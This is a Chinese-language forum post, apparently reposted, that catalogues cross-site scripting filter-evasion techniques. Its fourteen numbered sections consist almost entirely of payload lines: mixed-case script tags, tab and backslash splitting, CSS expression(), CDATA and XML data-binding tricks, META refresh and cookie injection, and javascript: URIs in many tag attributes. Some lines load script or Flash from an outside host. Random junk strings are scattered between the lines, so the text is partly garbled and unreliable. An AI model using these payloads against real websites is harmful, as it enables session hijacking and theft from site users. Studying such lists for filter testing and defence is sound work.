Cross Site Scripting(XSS)攻击手法介绍

admin

1. 改变字符大小写
$ k& L& ^: ?! R, m9 U

3 G" o. u; c% B: }2 L
7 m8 E$ Y6 }/ F6 G5 b! r. l    <sCript>alert(‘d’)</scRipT>
& \0 F' X) J  D
2. 利用多加一些其它字符来规避Regular Expression的检查
! c/ [5 Y. N3 @. |4 r- P; V( ]1 V
    <<script>alert(‘c’)//<</script>
) I: a; b4 C$ r0 X+ G: g0 {+ k5 @
! X/ A0 x# k9 ?! \4 _6 o    <SCRIPT a=">" SRC="t.js"></SCRIPT>
: i/ \* ?# S+ N. A
/ K! P0 E* K0 R: m2 X/ B3 f    <SCRIPT =">" SRC="t.js"></SCRIPT>
! g; D! l' R( u2 a0 G6 `6 z# v7 A
( J5 o, Q) j- z- q7 B7 w    <SCRIPT a=">" ” SRC="t.js"></SCRIPT>
4 P8 ~; {+ Q: u. v, F
    <SCRIPT "a=’>’" SRC="t.js"></SCRIPT>
8 c3 ^8 B6 K' u. ^' R/ D
9 p/ o6 ?5 V8 u. [' U9 v    <SCRIPT a=`>` SRC="t.js"></SCRIPT>
. w3 S5 ?* a3 @
9 Y6 N: H) `6 V0 f1 h; p  r    <SCRIPT a=">’>" SRC="t.js"></SCRIPT>

$ v3 t. b8 k$ E# L3. 以其它扩展名取代.js

    <script src="bad.jpg"></script>

7 Y' r5 }- t8 H( C) ^% ?4. 将Javascript写在CSS档里

    <LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">

/ Y8 y- B$ |9 V: d: c, Q       example:
) |, {! X/ l& ^) C
$ W! |8 g  Z; y          body {

! u! _+ `6 I; e- @9 g& |5 G/ k* j               background-image: url(‘javascript:alert("XSS");’)

$ K$ y  m* j, x: r( w$ g          }
( @: `. y6 K5 r
5. 在script的tag里加入一些其它字符

    <SCRIPT/SRC="t.js"></SCRIPT>

9 h+ R9 |; s1 @% I/ K- C- h    <SCRIPT/anyword SRC="t.js"></SCRIPT>
5 l3 L( U  t8 }4 a: r$ D7 {
1 P) T8 E2 @% P6 j' U/ g6. 使用tab或是new line来规避
; K1 V* A) k6 ~; D2 I8 ?
! N$ [% F1 g! S    <img src="jav ascr ipt:alert(‘XSS3′)">
, v: X6 Z; i) P+ g( F# K
    <img src="jav ascr ipt:alert(‘XSS3′)">
, e- x3 M9 u) y7 }" P
    <IMG SRC="jav ascript:alert(‘XSS’);">

( k" m8 m8 ]$ e' a/ R0 z         -> tag

: s+ m+ B' t, W7 p8 N         -> new line
; l  D5 k" b* }7 l
# R/ D) }2 K* i7. 使用"\"来规避
9 B( ]: c; X5 E
. O& Z  |: `& b7 B4 ]    <STYLE>@im\port’\ja\vasc\ript:alert("XSS32")’;</STYLE>

3 m9 J( x, K& M* s( p    <IMG STYLE=’xss:expre\ssion(alert("XSS33"))’>

    <IMG STYLE="xss:expr/*anyword*/ession(alert(‘sss’))">

    <DIV STYLE="width: expre\ssi\on(alert(‘XSS31′));">
' N& P, @9 H: s# }1 Q+ }
    <A STYLE=’no\xss:noxss("*//*"); xss:ex/*XSS*//*/*/pression(alert("XSS"))’>

8. 使用Hex encode来规避(也可能会把";"拿掉)
7 b7 ]+ l  z& g8 ^2 ~# U4 N$ A
    <DIV STYLE="width: expre\ssi\on(alert(‘XSS31′));">

        原始码：<DIV STYLE="width: expre\ssi\on(alert(‘XSS31′));">

4 m1 F& X8 c) B& a% i$ o5 m( u    <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert(‘abc’);">
; K# B8 e1 A8 o( g
) [( c7 Y2 E0 S- \        原始码：<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert(‘abc’);">

9. script in HTML tag
0 T6 n( N7 d. I' s5 F" s6 [
    <body onload=」alert(‘onload’)」>

( V: s9 I6 j; q3 y$ D( u        onabort, onactivate, onafterprint, onafterupdate, onbeforeactivate, onbeforecopy, onbeforecut, onbeforedeactivate, onbeforeeditfocus, onbeforepaste, onbeforeprint, onbeforeunload, onbeforeupdate, onblur, onbounce, oncellchange, onchange, onclick, oncontextmenu, oncontrolselect, oncopy, oncut, ondataavailable, ondatasetchanged, ondatasetcomplete, ondblclick, ondeactivate, ondrag, ondragend, ondragenter, ondragleave, ondragover, ondragstart, ondrop, onerror, onerrorupdate, onfilterchange, onfinish, onfocus, onfocusin, onfocusout, onhelp, onkeydown, onkeypress, onkeyup, onlayoutcomplete, onload, onlosecapture, onmousedown, onmouseenter, onmouseleave, onmousemove, onmouseout, onmouseover, onmouseup, onmousewheel, onmove, onmoveend, onmovestart, onpaste, onpropertychange, onreadystatechange, onreset, onresize, onresizeend, onresizestart, onrowenter, onrowexit, onrowsdelete, onrowsinserted, onscroll, onselect, onselectionchange, onselectstart, onstart, onstop, onsubmit, onunload
$ H2 ~- ~: G% o. ?; F+ y3 q
10. 在swf里含有xss的code

4 Y6 P# d7 n+ B9 Z" v    <EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED>
. M: C3 P/ K8 I4 x
. b! Z: k; ~+ d0 t$ a+ E1 j4 d/ d11. 利用CDATA将xss的code拆开，再组合起来。

    <XML ID=I><X><C>
6 t4 h) ]2 U  [4 ]: ]
" N3 \, ~8 E8 s    <![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]>

# K' V4 Y. h- {( ~    </C></X>
# d. K3 ~: a, `# @, Y: s% n
    </xml>

    <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
0 L6 p' @, p% Y
! Z# P3 h- p) A$ ?( P, U- d' c    <XML ID="xss"><I><B><IMG SRC="javas<!– –>cript:alert(‘XSS’)"></B></I></XML>

+ E8 K& O2 R( H( `! I; m. d: |    <SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>

12. 利用HTML+TIME。

    <HTML><BODY>

& J9 D: `& q( o# W3 s6 b3 s* \2 Y    <?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time">
( p3 Q( q7 y% Z
0 l: v* h0 b4 F8 k    <?import namespace="t" implementation="#default#time2">

9 Z* o) j/ J  b) J' K    <t:set attributeName="innerHTML" to="anyword<SCRIPTDEFER>alert("XSS")</SCRIPT>">

- h- a% O: s/ W, g5 ^; _    </BODY></HTML>
8 v, v. O  D$ g2 N8 W0 i8 b& M0 n
13. 透过META写入Cookie。
. t- U: P, s& G% K
7 S/ X: C8 O$ u5 {" {3 |    <META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert(‘XSS’)</SCRIPT>">
' `, j& J7 ~% W4 `
14. javascript in src , href , url
8 N+ b8 S) l5 F! `
    <IFRAME SRC=javascript:alert(’13′)></IFRAME>
1 \1 h1 j/ v( i) X
& n2 B1 T; ?1 C9 \- V9 J! I. b    <img src="javascript:alert(‘XSS3′)">
$ A, k& M7 e+ b& C/ o
<IMG DYNSRC="javascript:alert(‘XSS20′)">
* x# n3 P3 L5 s& J9 ?/ [
    <IMG LOWSRC="javascript:alert(‘XSS21′)">
- _1 y% d* }' e
    <LINK REL="stylesheet" HREF="javascript:alert(‘XSS24′);">
% {- {1 k- }- x, E4 P4 l0 v; I
6 m+ G7 K7 O% e9 r$ o2 o5 H+ E/ ^    <IFRAME SRC=javascript:alert(‘XSS27′)></IFRAME>

0 t3 {) k( x" u4 C6 X    <TABLE BACKGROUND="javascript:alert(‘XSS29′)">
. K. o# O9 {4 O) [4 n/ |
, \0 A* y% M! y- J/ i8 M9 f    <DIV STYLE="background-image: url(javascript:alert(‘XSS30′))">

! \% N6 |; q# Y; c    <STYLE TYPE="text/css">.XSS{background image:url("javascript:alert(‘XSS35′)");}
; r3 B" i3 b) R) U2 O
' a$ h. F; D$ B% k; d    </STYLE><A CLASS=XSS></A>

. X, p- y% e3 k8 i0 J# i& ~5 w    <FRAMESET><FRAME SRC="javascript:alert(‘XSS’);"></FRAMESET>